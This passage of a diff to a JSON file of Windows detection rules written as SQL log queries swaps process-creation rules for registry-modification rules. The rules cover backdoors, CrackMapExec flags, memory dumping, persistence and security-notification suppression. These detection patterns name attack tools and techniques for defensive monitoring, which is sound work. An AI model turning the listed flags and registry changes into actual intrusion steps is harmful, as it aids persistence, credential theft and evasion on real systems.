'\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1574.001" + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "title": "Potential PowerShell Execution Policy Tampering", + "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (NewValue LIKE '%Bypass%' ESCAPE '\\' OR NewValue LIKE '%RemoteSigned%' ESCAPE '\\' OR NewValue LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_powershell_execution_policy.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", - "id": "9fbf5927-5261-4284-a71d-f681029ea574", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate activity is expected since compressing files with a password is common." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_password_compression.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Wow6432Node CurrentVersion Autorun Keys Modification", + "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Administrative scripts" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (NewValue LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR NewValue = 'grpconv -o' OR NewValue LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND NewValue LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND NewValue LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND NewValue LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND NewValue LIKE '% /burn.runonce' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1564.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Unusually Long PowerShell CommandLine", - "id": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", - "status": "test", - "description": "Detects unusually long PowerShell command lines with a length of 1000 characters or more", - "author": "oscd.community, Natalia Shornikova", + "title": "Activate Suppression of Windows Security Center Notifications", + "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "status": "experimental", + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.dll' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows Powershell' OR Product = 'PowerShell Core 6') AND CommandLine REGEXP '.{1000,}')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_abnormal_commandline_size.yml" + "filename": "registry_set_suppress_defender_notifications.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "Suspicious Scheduled Task Name As GUID", - "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", - "status": "experimental", - "description": "Detects creation of a scheduled task with a GUID like name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1569.002" ], "falsepositives": [ - "Legitimate software naming their tasks as GUIDs" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_guid_task_name.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "Sideloading Link.EXE", - "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "title": "Disable Windows Security Center Notifications", + "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", "status": "experimental", - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" + "filename": "registry_set_disable_security_center_notifications.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Remote CHM File Download/Execution Via HH.EXE", - "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.credential_access", + 